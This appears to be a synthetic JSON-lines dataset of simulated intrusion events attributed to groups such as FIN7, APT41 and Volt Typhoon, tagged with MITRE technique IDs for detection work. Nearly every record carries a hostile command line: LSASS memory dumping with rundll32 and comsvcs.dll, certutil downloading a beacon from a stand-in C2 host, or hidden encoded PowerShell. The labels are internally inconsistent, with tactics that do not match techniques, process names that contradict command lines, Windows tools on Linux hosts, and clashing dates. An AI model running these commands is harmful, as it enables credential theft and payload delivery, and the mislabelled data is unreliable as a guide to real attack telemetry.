{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1546.003 using LOLBin technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Impact"],"technique_id":"T1546.003"},"event_id":"evt_unc4841_20261012T090735000Z_0007495","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.55.234.105","name":"DB-ORACLE-THLE12SKB1","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7495UNC4841T1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.2.18.154","dst_port":443,"protocol":"HTTP/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc UQBvAHcAZQByAFMAaABlAGwAbAAgAC0A...","name":"mshta.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-22T07:53:03.000Z","user":{"name":"svc_5y3ybevwipk4","sid":"S-1-5-21-463508776-398895397-8095"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Privilege Escalation","Lateral Movement","Persistence"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20260605T041413000Z_0007497","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Fileless","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.36.35.84","name":"IAM-ROLE-CUX1ZNLWJ3","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7497UNC4841T1059.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.2.48.254","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1354 C:\\temp\\lsass.dmp full","name":"wmic.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-08-07T22:34:16.000Z","user":{"name":"arn:aws:iam::zdpfa07lcenm","sid":"S-1-5-21-497763008-382175405-4572"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using cloud-native technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Initial Access"],"technique_id":"T1531"},"event_id":"evt_fin7_20251006T140600000Z_0007499","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","TLS","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.96.212.229","name":"EC2-INST-REQNYHUFQI","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7499FIN7T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.17.227.209","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2754 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-09-17T04:13:55.000Z","user":{"name":"i-luln3c8z5y5c","sid":"S-1-5-21-102310319-394470535-1286"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Credential Access","Initial Access","Reconnaissance"],"technique_id":"T1531"},"event_id":"evt_fin7_20251211T181038000Z_0007501","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["WMI","TLS","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.214.59.226","name":"WIN-FIN-SRV-OA82DVQYKJ","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7501FIN7T1531"},"network":{"domain":"update.microsoft.com","dst_ip":"1.151.22.116","dst_port":445,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3762 C:\\temp\\lsass.dmp full","name":"cmstp.exe","parent_name":"winlogon.exe"},"source":"Azure AD Sign-in Logs","timestamp":"2026-06-04T02:46:53.000Z","user":{"name":"svc_t31huhumehgc","sid":"S-1-5-21-880875039-360303455-5021"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1570 using encrypted C2 technique.","sub_technique":"Lateral Tool Transfer","tactic":["Persistence","Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_fin7_20250910T114734000Z_0007503","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.1.73.52","name":"DB-ORACLE-8SWQU7VZGS","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7503FIN7T1570"},"network":{"domain":"update.microsoft.com","dst_ip":"1.156.66.139","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2025-08-13T22:03:11.000Z","user":{"name":"i-eo817hgqxhkq","sid":"S-1-5-21-686354018-742128433-8073"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Collection","Command and Control","Execution"],"technique_id":"T1566.001"},"event_id":"evt_volttyphoon_20260404T020239000Z_0007505","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["TLS","JA3 Spoof","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.179.252.79","name":"WIN-FIN-SRV-OF3GZV7TKK","os":"Windows Server 2022"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7505Volt TyphoonT1566.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.57.134.168","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2641 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-05-24T18:06:17.000Z","user":{"name":"i-p95t1my4eqsu","sid":"S-1-5-21-973407943-754434566-1680"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Collection"],"technique_id":"T1003.001"},"event_id":"evt_fin7_20251108T041254000Z_0007507","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["TLS","WMI","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.71.49.100","name":"WIN-FIN-SRV-C0KWRQBGT3","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7507FIN7T1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.94.163.126","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-08-07T19:43:06.000Z","user":{"name":"i-tuntatkd89bm","sid":"S-1-5-21-920684827-664287938-3562"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1071.001 using fileless technique.","sub_technique":"Web Protocols (HTTPS C2)","tactic":["Collection","Execution","Command and Control"],"technique_id":"T1071.001"},"event_id":"evt_fin7_20260630T232849000Z_0007509","ground_truth":{"detection_guidance":"Sigma rule for T1071.001 | Join on src_ip within 10m","evasion_used":["Fileless","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.252.197.90","name":"APP-WEB-PZ4K7RTEJD","os":"Ubuntu 22.04"},"impact":{"business_risk":"Cloud environment takeover","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7509FIN7T1071.001"},"network":{"domain":"aws.amazon.com","dst_ip":"1.77.176.155","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"winlogon.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-10-26T07:42:47.000Z","user":{"name":"svc_2c1jqptvl2zj","sid":"S-1-5-21-906339054-360363518-3041"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1566.001 using encrypted C2 technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Initial Access"],"technique_id":"T1566.001"},"event_id":"evt_apt41_20251210T063233000Z_0007511","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.246.171.137","name":"AZURE-VM-ACRE4XTPZF","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7511APT41T1566.001"},"network":{"domain":"github.com","dst_ip":"1.82.244.97","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"svchost.exe"},"source":"Windows Security Log","timestamp":"2025-01-15T21:27:54.000Z","user":{"name":"svc_hmyqwpaykjt0","sid":"S-1-5-21-349275110-122286270-5704"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1059.001 using cloud-native technique.","sub_technique":"PowerShell","tactic":["Persistence","Credential Access"],"technique_id":"T1059.001"},"event_id":"evt_unc4841_20251108T004716000Z_0007513","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","LOLBin"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Prelude"},"host":{"ip":"10.12.177.115","name":"WIN-FIN-SRV-78JTJT4F7M","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7513UNC4841T1059.001"},"network":{"domain":"github.com","dst_ip":"1.88.3.172","dst_port":443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 1655 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"services.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-02-05T08:55:49.000Z","user":{"name":"azuread\\e4lsyho4lvbq","sid":"S-1-5-21-581349581-886356142-6495"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1531 using encrypted C2 technique.","sub_technique":"Cloud Service Hijack / Account Access Removal","tactic":["Defense Evasion","Credential Access","Exfiltration"],"technique_id":"T1531"},"event_id":"evt_apt41_20260513T035259000Z_0007515","ground_truth":{"detection_guidance":"Sigma rule for T1531 | Join on src_ip within 10m","evasion_used":["Base64","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.75.217.183","name":"APP-WEB-CQPYYDAO8Z","os":"Windows 11"},"impact":{"business_risk":"Cloud environment takeover","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7515APT41T1531"},"network":{"domain":"aws.amazon.com","dst_ip":"1.134.7.130","dst_port":8443,"protocol":"HTTP/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2765 C:\\temp\\lsass.dmp full","name":"certutil.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-01-20T10:42:13.000Z","user":{"name":"CORP\\cslj2c04xvnd","sid":"S-1-5-21-347563990-217034195-9365"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1098.004 using cloud-native technique.","sub_technique":"SSH Authorized Keys","tactic":["Execution","Collection","Persistence"],"technique_id":"T1098.004"},"event_id":"evt_volttyphoon_20251130T143827000Z_0007517","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.34.98.241","name":"EC2-INST-QOJSAQOQ47","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7517Volt TyphoonT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.176.245.213","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2025-04-08T17:03:33.000Z","user":{"name":"CORP\\u09hkssu6i5f","sid":"S-1-5-21-229797100-805360893-6943"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access","Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_unc4841_20260623T063033000Z_0007519","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.74.236.212","name":"IAM-ROLE-AGIVNO64SX","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7519UNC4841T1098.004"},"network":{"domain":"aws.amazon.com","dst_ip":"1.24.6.153","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"bitsadmin.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-04-14T05:29:20.000Z","user":{"name":"i-mmjg864b94uc","sid":"S-1-5-21-692866725-777103996-4409"}} |
{"attack":{"actor":"Scattered Spider","confidence":1.0,"description":"[Scattered Spider] performed T1098.004 using LOLBin technique.","sub_technique":"SSH Authorized Keys","tactic":["Defense Evasion"],"technique_id":"T1098.004"},"event_id":"evt_scatteredspider_20251206T230506000Z_0007521","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Base64","JA3 Spoof"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.18.81.120","name":"IAM-ROLE-FTXUHBX8BI","os":"Windows 11"},"impact":{"business_risk":"Data exfiltration channel open","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7521Scattered SpiderT1098.004"},"network":{"domain":"cdn-content.com","dst_ip":"1.31.93.170","dst_port":8443,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc aWV4IChOZXctT2JqZWN0IE5ldC...","name":"certutil.exe","parent_name":"svchost.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-08-29T15:44:27.000Z","user":{"name":"azuread\\d4rwnq68ga16","sid":"S-1-5-21-983383739-998002014-6048"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using fileless technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Exfiltration","Initial Access","Reconnaissance"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20250423T171738000Z_0007523","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","TLS","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.96.87.79","name":"AZURE-VM-8VKZGY7XWE","os":"Windows 11"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7523UNC4841T1566.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.27.200.143","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"wmic.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2026-12-26T15:28:00.000Z","user":{"name":"svc_48q6ewf1za0j","sid":"S-1-5-21-829839523-138332164-2957"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1546.003 using encrypted C2 technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Credential Access","Persistence"],"technique_id":"T1546.003"},"event_id":"evt_volttyphoon_20250107T063806000Z_0007525","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["WMI","Fileless","Base64"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Atomic Red Team"},"host":{"ip":"10.240.21.93","name":"EC2-INST-WWB23I66RZ","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7525Volt TyphoonT1546.003"},"network":{"domain":"cdn-content.com","dst_ip":"1.80.237.85","dst_port":5985,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"cmstp.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-08-21T06:03:42.000Z","user":{"name":"i-cl301sjhoqh7","sid":"S-1-5-21-893791825-912078403-3042"}} |
{"attack":{"actor":"Volt Typhoon","confidence":1.0,"description":"[Volt Typhoon] performed T1003.001 using LOLBin technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Credential Access","Exfiltration"],"technique_id":"T1003.001"},"event_id":"evt_volttyphoon_20250201T094304000Z_0007527","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["LOLBin","WMI","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.164.131.88","name":"IAM-ROLE-GE0ERAC8SS","os":"Windows 11"},"impact":{"business_risk":"Domain dominance","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7527Volt TyphoonT1003.001"},"network":{"domain":"github.com","dst_ip":"1.112.38.104","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2293 C:\\temp\\lsass.dmp full","name":"bitsadmin.exe","parent_name":"winlogon.exe"},"source":"CloudTrail (DS0028)","timestamp":"2026-03-31T22:36:31.000Z","user":{"name":"i-c5irkzxxjxuo","sid":"S-1-5-21-595467640-143325979-9065"}} |
{"attack":{"actor":"Mustang Panda","confidence":1.0,"description":"[Mustang Panda] performed T1003.001 using encrypted C2 technique.","sub_technique":"OS Credential Dumping: LSASS Memory","tactic":["Command and Control","Lateral Movement"],"technique_id":"T1003.001"},"event_id":"evt_mustangpanda_20250724T044803000Z_0007529","ground_truth":{"detection_guidance":"Sigma rule for T1003.001 | Join on src_ip within 10m","evasion_used":["Base64","WMI","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.215.117.236","name":"APP-WEB-5TQ0V8SZ77","os":"Windows Server 2022"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7529Mustang PandaT1003.001"},"network":{"domain":"update.microsoft.com","dst_ip":"1.8.211.150","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3433 C:\\temp\\lsass.dmp full","name":"rundll32.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2025-10-06T13:39:34.000Z","user":{"name":"svc_2serl5avrccn","sid":"S-1-5-21-697996248-654694313-6264"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1570 using cloud-native technique.","sub_technique":"Lateral Tool Transfer","tactic":["Credential Access","Execution","Impact"],"technique_id":"T1570"},"event_id":"evt_unc4841_20261020T062652000Z_0007531","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["JA3 Spoof","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.33.38.217","name":"EC2-INST-Y4T70AEXIS","os":"Ubuntu 22.04"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7531UNC4841T1570"},"network":{"domain":"cdn-content.com","dst_ip":"1.93.244.121","dst_port":3389,"protocol":"HTTP/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"rundll32.exe","parent_name":"explorer.exe"},"source":"PowerShell Logging (DS0017)","timestamp":"2025-06-21T21:36:31.000Z","user":{"name":"CORP\\9l68uekdkci4","sid":"S-1-5-21-667216704-864414683-8814"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1570 using fileless technique.","sub_technique":"Lateral Tool Transfer","tactic":["Lateral Movement"],"technique_id":"T1570"},"event_id":"evt_apt41_20250916T203509000Z_0007533","ground_truth":{"detection_guidance":"Sigma rule for T1570 | Join on src_ip within 10m","evasion_used":["Base64","LOLBin","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.150.114.35","name":"EC2-INST-RWUZ23714X","os":"Windows Server 2022"},"impact":{"business_risk":"Domain dominance","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7533APT41T1570"},"network":{"domain":"aws.amazon.com","dst_ip":"1.45.131.81","dst_port":5985,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"powershell.exe -nop -w hidden -enc JABkACAALQBlAH...","name":"rundll32.exe","parent_name":"services.exe"},"source":"Windows Security Log","timestamp":"2025-11-07T12:28:40.000Z","user":{"name":"azuread\\l455033fslen","sid":"S-1-5-21-183935176-277944343-7392"}} |
{"attack":{"actor":"Lapsus$","confidence":1.0,"description":"[Lapsus$] performed T1059.001 using fileless technique.","sub_technique":"PowerShell","tactic":["Collection","Defense Evasion","Discovery"],"technique_id":"T1059.001"},"event_id":"evt_lapsus_20250324T160521000Z_0007535","ground_truth":{"detection_guidance":"Sigma rule for T1059.001 | Join on src_ip within 10m","evasion_used":["LOLBin","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Caldera"},"host":{"ip":"10.157.173.167","name":"AZURE-VM-GOIB26VNMD","os":"Amazon Linux 2"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7535Lapsus$T1059.001"},"network":{"domain":"github.com","dst_ip":"1.146.91.71","dst_port":3389,"protocol":"TLSv1.3/TCP"},"process":{"cmdline":"certutil.exe -urlcache -split -f https://mal.c2/beacon.bin beacon.dll","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Windows Security Log","timestamp":"2026-06-08T23:10:06.000Z","user":{"name":"arn:aws:iam::dpek7yr5fdaq","sid":"S-1-5-21-354301122-755181760-1740"}} |
{"attack":{"actor":"APT41","confidence":1.0,"description":"[APT41] performed T1546.003 using cloud-native technique.","sub_technique":"Event Triggered Execution: WMI Event Subscription","tactic":["Defense Evasion"],"technique_id":"T1546.003"},"event_id":"evt_apt41_20250207T234935000Z_0007537","ground_truth":{"detection_guidance":"Sigma rule for T1546.003 | Join on src_ip within 10m","evasion_used":["Fileless","Base64","TLS"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"Stratus Red Team"},"host":{"ip":"10.162.69.145","name":"DB-ORACLE-L3B65OSQ05","os":"Ubuntu 22.04"},"impact":{"business_risk":"Long-term persistence achieved","severity":"High"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7537APT41T1546.003"},"network":{"domain":"github.com","dst_ip":"1.125.236.34","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 2375 C:\\temp\\lsass.dmp full","name":"mshta.exe","parent_name":"explorer.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-02-10T07:27:37.000Z","user":{"name":"i-yu16dgt8djvv","sid":"S-1-5-21-565441621-825443212-7019"}} |
{"attack":{"actor":"UNC4841","confidence":1.0,"description":"[UNC4841] performed T1566.001 using cloud-native technique.","sub_technique":"Phishing: Spearphishing Attachment","tactic":["Defense Evasion"],"technique_id":"T1566.001"},"event_id":"evt_unc4841_20260212T114154000Z_0007539","ground_truth":{"detection_guidance":"Sigma rule for T1566.001 | Join on src_ip within 10m","evasion_used":["Base64","JA3 Spoof","Fileless"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.130.13.20","name":"AZURE-VM-2DP35I7FI2","os":"Windows Server 2022"},"impact":{"business_risk":"Long-term persistence achieved","severity":"Extreme"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7539UNC4841T1566.001"},"network":{"domain":"github.com","dst_ip":"1.103.186.220","dst_port":445,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3002 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"services.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-07-06T19:54:09.000Z","user":{"name":"azuread\\57um885bakp4","sid":"S-1-5-21-609258543-231074189-8190"}} |
{"attack":{"actor":"FIN7","confidence":1.0,"description":"[FIN7] performed T1098.004 using encrypted C2 technique.","sub_technique":"SSH Authorized Keys","tactic":["Credential Access"],"technique_id":"T1098.004"},"event_id":"evt_fin7_20251127T034133000Z_0007541","ground_truth":{"detection_guidance":"Sigma rule for T1098.004 | Join on src_ip within 10m","evasion_used":["TLS","Base64","WMI"],"mitre_eval_step":"MITRE 2025\u20132026 Evaluation","simulation_tool":"BloodHound"},"host":{"ip":"10.222.123.191","name":"APP-WEB-R41WN0FEXV","os":"Ubuntu 22.04"},"impact":{"business_risk":"Data exfiltration channel open","severity":"Critical"},"metadata":{"dataset":"Elite Unlimited Commercial Dataset 2025+","generator_version":"v2.1 (Fixed & Stable)","variation_seed":"7541FIN7T1098.004"},"network":{"domain":"github.com","dst_ip":"1.41.121.188","dst_port":443,"protocol":"TLSv1.2/TCP"},"process":{"cmdline":"rundll32.exe comsvcs.dll, MiniDump 3817 C:\\temp\\lsass.dmp full","name":"powershell.exe","parent_name":"winlogon.exe"},"source":"Network Connection (DS0029)","timestamp":"2026-08-30T12:51:34.000Z","user":{"name":"CORP\\yfhk78dlfdwd","sid":"S-1-5-21-421081917-420407781-7828"}} |
